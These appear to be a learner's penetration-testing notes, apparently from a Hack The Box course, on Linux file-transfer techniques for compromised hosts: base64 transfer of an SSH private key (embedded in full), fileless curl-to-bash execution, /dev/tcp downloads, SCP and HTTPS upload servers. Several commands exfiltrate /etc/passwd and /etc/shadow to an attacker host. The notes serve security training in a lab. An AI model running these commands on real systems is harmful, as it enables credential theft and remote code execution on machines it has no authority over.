#linuxFileTransfer #LinuxDownload #linuxUpload

Although Linux can communicate via FTP, SMB like Windows, most malware on all different operating systems uses `HTTP` and `HTTPS` for communication.



## Base64 Encoding / Decoding

#### Check File MD5 hash

```
oib3u@htb[/htb]$ md5sum id_rsa

4e301756a07ded0a2dd6953abf015278  id_rsa
```


```
cat id_rsa |base64 -w 0;echo
```

`-w 0` to create only one line and ended up with the command with a semi-colon (;)
`echo` keyword to start a new line and make it easier to copy.

We copy this content, paste it onto our Linux target machine, and use `base64` with the option `-d' to decode it.

```
echo -n 'LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=' | base64 -d > id_rsa
```

Finally, we can confirm if the file was transferred successfully using the `md5sum` command.
#### Linux - Confirm the MD5 Hashes Match

`oib3u@htb[/htb]$ md5sum id_rsa 4e301756a07ded0a2dd6953abf015278  id_rsa`

**Note:** You can also upload files using the reverse operation. From your compromised target cat and base64 encode a file and decode it in your Pwnbox.


## Web Downloads with Wget and cURL


```
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh
```

-O to set the output filename.

`cURL` is very similar to `wget`, but the output filename option is lowercase `-o'.

```
oib3u@htb[/htb]$ curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
```


## Fileless Attacks Using Linux

Because of the way Linux works and how [pipes operate](https://www.geeksforgeeks.org/piping-in-unix-or-linux/), most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.

**Note:** Some payloads such as `mkfifo` write files to disk. Keep in mind that while the execution of the payload may be fileless when you use a pipe, depending on the payload chosen it may create temporary files on the OS.

#### Fileless Download with cURL

`oib3u@htb[/htb]$ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash`

Similarly, we can download a Python script file from a web server and pipe it into the Python binary. Let's do that, this time using `wget`.

#### Fileless Download with wget

`oib3u@htb[/htb]$ wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3 Hello World!`

## Download with Bash (/dev/tcp)

If none of the tools are available, as long as we got Bash ver > 2.04 (compiled with --enable-net-redirections), the built in /dev/TCP device file can be used for simple file downloads.

#### Connect to the Target Webserver

        shellsession
`oib3u@htb[/htb]$ exec 3<>/dev/tcp/10.10.10.32/80`

#### HTTP GET Request

        shellsession
`oib3u@htb[/htb]$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3`

#### Print the Response

        shellsession
`oib3u@htb[/htb]$ cat <&3`

## SSH Downloads

SSH implementation comes with an SCP utility for remote transfer.
SCP is very similar to copy/cp, but instead of providing local path, we need to specify username, remote IP address/DNS name and user's credentials.

#### Enabling the SSH Server

`oib3u@htb[/htb]$ sudo systemctl enable ssh Synchronizing state of ssh.service with SysV service script with /lib/systemd/systemd-sysv-install. Executing: /lib/systemd/systemd-sysv-install enable ssh Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45 ...SNIP...`

#### Starting the SSH Server

`oib3u@htb[/htb]$ sudo systemctl start ssh`

#### Checking for SSH Listening Port

`oib3u@htb[/htb]$ netstat -lnpt (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name     tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -`

Now we can begin transferring files. We need to specify the IP address of our Pwnbox and the username and password.

#### Linux - Downloading Files Using SCP

`oib3u@htb[/htb]$ scp plaintext@192.168.49.128:/root/myroot.txt .`

**Note:** You can create a temporary user account for file transfers and avoid using your primary credentials or keys on a remote computer.

## Upload Operations
There are also situations such as binary exploitation and packet capture analysis, where we must upload files from our target machine onto our attack host. The methods we used for downloads will also work for uploads. Let's see how we can upload files in various ways.

## Web Upload

As mentioned in the `Windows File Transfer Methods` section, we can use [uploadserver](https://github.com/Densaugeo/uploadserver), an extended module of the Python `HTTP.Server` module, which includes a file upload page. For this Linux example, let's see how we can configure the `uploadserver` module to use `HTTPS` for secure communication.

The first thing we need to do is to install the `uploadserver` module.

#### Pwnbox - Start Web Server

`$ uploadserver`

Now we create certificate , in this example we use self-signed cert.

```
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

Generating a RSA private key
................................................................................+++++
.......+++++
writing new private key to 'server.pem'
-----
```

The webserver should not host the certificate. We recommend creating a new directory to host the file for our webserver.

```
oib3u@htb[/htb]$ mkdir https && cd https
```

`uploadserver 443 --server-certificate ~/server.pem`

Now from our compromised machine, let's upload the `/etc/passwd` and `/etc/shadow` files.

```
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```

We used the option `--insecure` because we used a self-signed certificate that we trust.

## Alternative Web File Transfer Method
Since Linux distributions usually have `Python` or `php` installed, starting a web server to transfer files is straightforward. Also, if the server we compromised is a web server, we can move the files we want to transfer to the web server directory and access them from the web page, which means that we are downloading the file from our Pwnbox.

It is possible to stand up a web server using various languages. A compromised Linux machine may not have a web server installed. In such cases, we can use a mini web server. What they perhaps lack in security, they make up for flexibility, as the webroot location and listening ports can quickly be changed.

#### Linux - Creating a Web Server with Python3

`oib3u@htb[/htb]$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...`

#### Linux - Creating a Web Server with Python2.7

`oib3u@htb[/htb]$ python2.7 -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...`

#### Linux - Creating a Web Server with PHP

`oib3u@htb[/htb]$ php -S 0.0.0.0:8000 [Fri May 20 08:16:47 2022] PHP 7.4.28 Development Server (http://0.0.0.0:8000) started`

#### Linux - Creating a Web Server with Ruby

`oib3u@htb[/htb]$ ruby -run -ehttpd . -p8000 [2022-05-23 09:35:46] INFO  WEBrick 1.6.1 [2022-05-23 09:35:46] INFO  ruby 2.7.4 (2021-07-07) [x86_64-linux-gnu] [2022-05-23 09:35:46] INFO  WEBrick::HTTPServer#start: pid=1705 port=8000`

#### Download the File from the Target Machine onto the Pwnbox

`oib3u@htb[/htb]$ wget 192.168.49.128:8000/filetotransfer.txt --2022-05-20 08:13:05--  http://192.168.49.128:8000/filetotransfer.txt Connecting to 192.168.49.128:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 0 [text/plain] Saving to: 'filetotransfer.txt' filetotransfer.txt                       [ <=>                                                                  ]       0  --.-KB/s    in 0s       2022-05-20 08:13:05 (0.00 B/s) - ‘filetotransfer.txt’ saved [0/0]`

**Note:** When we start a new web server using Python or PHP, it's important to consider that inbound traffic may be blocked. We are transferring a file from our target onto our attack host, but we are not uploading the file.

## SCP Upload
We may find some companies that allow the `SSH protocol` (TCP/22) for outbound connections, and if that's the case, we can use an SSH server with the `scp` utility to upload files. Let's attempt to upload a file to the target machine using the SSH protocol.

#### File Upload using SCP

`oib3u@htb[/htb]$ scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/
**Note:** Remember that scp syntax is similar to cp or copy.

